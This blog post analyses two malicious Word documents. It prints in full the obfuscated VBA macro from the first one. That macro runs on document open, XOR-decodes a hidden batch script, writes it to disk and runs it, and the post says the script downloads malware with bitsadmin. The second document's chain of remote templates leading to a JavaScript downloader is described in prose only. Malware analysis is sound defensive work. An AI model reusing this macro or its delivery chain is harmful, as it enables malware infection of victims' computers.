A close look at malicious documents (Part I )

This month, I have examined many malicious documents with different formats including doc, docx, and rtf files. In this post, I am going to provide the detailed analysis of two of them. In the next post, I will dissect a few more samples.

All the samples were downloaded from the Hybrid Analysis website.

1. d.doc

Link: https://www.hybrid-analysis.com/sample/23621a3fc10008a5df8f89a86079d0ce0da486961e1432f08dffd5d18d92c553

Format: doc

SHA1: 23621a3fc10008a5df8f89a86079d0ce0da486961e1432f08dffd5d18d92c553

I used olevba3 tool, part of the python-oletools package,  to extract the embedded malicious vba macro:

instance1-1
Fig 1: d.doc contains vba macro

Let’s take a look at the embedded macro:


Public Function UBdUOhMcyUWrMZ(HMKDzKzDHz As String) As String
Dim lkKYZFdY As Long
Dim RJWTuZIAuReXCx As String
Dim cTnJICupsJRNlc As String
Dim snbnvr As String
Dim aoTwk As String
aoTwk = "StarWars"
For lkKYZFdY = 1 To (Len(HMKDzKzDHz) / 2)
cTnJICupsJRNlc = Val("&H" & (Mid$(HMKDzKzDHz, (2 * lkKYZFdY) - 1, 2)))
snbnvr = Asc(Mid$(aoTwk, ((lkKYZFdY Mod Len(aoTwk)) + 1), 1))
RJWTuZIAuReXCx = RJWTuZIAuReXCx + Chr(cTnJICupsJRNlc Xor snbnvr)
Next lkKYZFdY
UBdUOhMcyUWrMZ = RJWTuZIAuReXCx
End Function

Private Sub Document_Open()
wjApDbyvFXeheKrnLrZSjtXMR
End Sub

Private Sub wjApDbyvFXeheKrnLrZSjtXMR()
On Error Resume Next
Dim EadZpZKVVGSqQZudJbdwILO As String
Dim vKsPyKrBKsrMLthTNkrLdPeKCU As Integer
Dim gtAZUaziMwPqLqNDkEbbAP As String
MkDir "C:\Wong"
gtAZUaziMwPqLqNDkEbbAP = "C:\Wong\ksoSFGqJ.bat"
EadZpZKVVGSqQZudJbdwILO = UBdUOhMcyUWrMZ("190552145B2E243C1A067F5D031B072015051F3E0F525C2706001C24071701731918183803525C371B161C3B0E1317735B11003E0E001A270D411A3E061A533B0015026D4E5D426B4C4F4067585C46615A534B7811001A2515151778031B1D7D1119177722482F041B0F150B505C162B11415477120612210041316D3D251C3D133D4379040A16") & vbcrlf & " DEL %~f0"
vKsPyKrBKsrMLthTNkrLdPeKCU = FreeFile
Open gtAZUaziMwPqLqNDkEbbAP For Output As #vKsPyKrBKsrMLthTNkrLdPeKCU
Print #vKsPyKrBKsrMLthTNkrLdPeKCU, EadZpZKVVGSqQZudJbdwILO
Close #vKsPyKrBKsrMLthTNkrLdPeKCU
Shell gtAZUaziMwPqLqNDkEbbAP, vbhide
End Sub

Public Function STEZYQmaIuuqXjOdSaIPzGggWeoZ(ByVal USAZaHnBdIMhpqMkDaPkjraw As Long) As String
Dim EwNThFXNUHqZpFdqWXoCsxBum As String
Dim pHgKWdUaNZX As String
EwNThFXNUHqZpFdqWXoCsxBum = Space$(255)
pHgKWdUaNZX = StrFormatByteSize(USAZaHnBdIMhpqMkDaPkjraw, EwNThFXNUHqZpFdqWXoCsxBum, , Len(EwNThFXNUHqZpFdqWXoCsxBum))
If InStr(pHgKWdUaNZX, vbNullChar) > 1 Then STEZYQmaIuuqXjOdSaIPzGggWeoZ = Left$(pHgKWdUaNZX, InStr(pHgKWdUaNZX, vbNullChar) - 1)
End If
End Function

Public Function RuFTbzzsrsIYkQZrXWsYFKwYcUXP(ByVal ukwzgetxtzILnCGgzUXhltRe As Long) As String
Dim nROTrRPNSvKfgQThFoxjJpFvv As String
Dim orFnvGTRRQw As String
nROTrRPNSvKfgQThFoxjJpFvv = Space$(255)
orFnvGTRRQw = StrFormatByteSize(ukwzgetxtzILnCGgzUXhltRe, nROTrRPNSvKfgQThFoxjJpFvv, , Len(nROTrRPNSvKfgQThFoxjJpFvv))
If InStr(orFnvGTRRQw, vbNullChar) > 1 Then RuFTbzzsrsIYkQZrXWsYFKwYcUXP = Left$(orFnvGTRRQw, InStr(orFnvGTRRQw, vbNullChar) - 1)
End If
End Function

Public Function kVKUCayWzjmCRzzUnLmXgFMqlHrw(ByVal yPHqMLqScfQerREPImVYdXGT As Long) As String
Dim LBPWLMfupTwFGvnObstjnTbaM As String
Dim iRAOgUpSgHd As String
LBPWLMfupTwFGvnObstjnTbaM = Space$(255)
iRAOgUpSgHd = StrFormatByteSize(yPHqMLqScfQerREPImVYdXGT, LBPWLMfupTwFGvnObstjnTbaM, , Len(LBPWLMfupTwFGvnObstjnTbaM))
If InStr(iRAOgUpSgHd, vbNullChar) > 1 Then kVKUCayWzjmCRzzUnLmXgFMqlHrw = Left$(iRAOgUpSgHd, InStr(iRAOgUpSgHd, vbNullChar) - 1)
End If
End Function

Upon opening the word document, Document_Open subroutine will be called (on line 16). Then, this sub calls wjApDbyvFXeheKrnLrZSjtXMR sub (on line 20), which is actually the main sub (it contains the main logic). By renaming the routine names and examining the code, we can get this:

instance1-2

Basically, this macro executes windows shell script (batch script), in which  bitsadmin tool is used to download the malware file, then this files will be executed on the victim machine.

 

Summary

Word doc -> embedded VBA macro (obfuscated) -> batch script (obfuscated) -> bitsadmin command

2. Product list.docx

Link: https://www.hybrid-analysis.com/sample/f9979e5b09025ec6d5645dd3ccd30e254d95cacb42112f0a5c2a1a71821e9ce2/5a9f73847ca3e124873f59d4

Format: docx

SHA1: f9979e5b09025ec6d5645dd3ccd30e254d95cacb42112f0a5c2a1a71821e9ce2

As you can see in Fig 3, this file does not contain any embedded vba macro/

instance 2
Fig 3: Product List.docx does not contain any vba macro

This document has a docx format, which is basically a zip archive of xml documents. So, we can unzip it with 7zip to examine its content. Here is the top level view of its content when we unzip it with 7zip:

instance 2-1

The attacker added an external Relationship of type AttachedTemplate to the setting of this docx file (\word\_rels\settings.xml.rels):

instance 2-2

As a result, whenever MS Word loads this documents, it downloads and interprets the remote word documents, umlwkm (md5: 7234cd5fd5d94ff6582f2d1412d8db6).

umlwkm is also a docx file with no embedded vba macro. The attacker added an external Relationship of type oleObject to its docuements.xml.rels.

instance 2-3

In this way, MS Words download ppxtmi.doc (md5: f93241e065be4fda46691bbefb18ad0e) from the remote location and loads it.

ppxtmi.doc is a rtf document, which is a text based format. It contains two embedded objects. The second object is an OLE object as it has “D0CF11E0A1B11AE1” in its content, which is a signature for OLE files (OLE files start with this sequence).

instance 2-4

For each object, we must convert the hexadecimal string  to binary. I did it by using the following one-liner python (python 3.6) code:

open(output, "wb").write(bytearray.fromhex(in_str))

 

where in_str is the hexadecimal string and output is the path of output file.

If we open the first dumped object in an hex editor, such as hexinator, we can see it contains a scriptlet, written in JavaScript:

instance 2-5

It downloads obprrg.exe (the malware) from the remote location, and then executes it.

Summary

docx (has an external relationship) -> docx (has an external relationship) -> rtf (embedded objects) -> scriptlet (JavaScript) -> malware (exe)

Advertisements

5 thoughts on “A close look at malicious documents (Part I )

    1. Hi, for extracting VBA macro from documents, you can use olevba or olevba3 (for python 3) as it shown in Fig 3. However, there is no tool available that can deobfuscate a VBA script. There might be some tools that can decode basic algorithms or specific ones but developing a general decoder or deofuscator is hard if not impossible

      Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s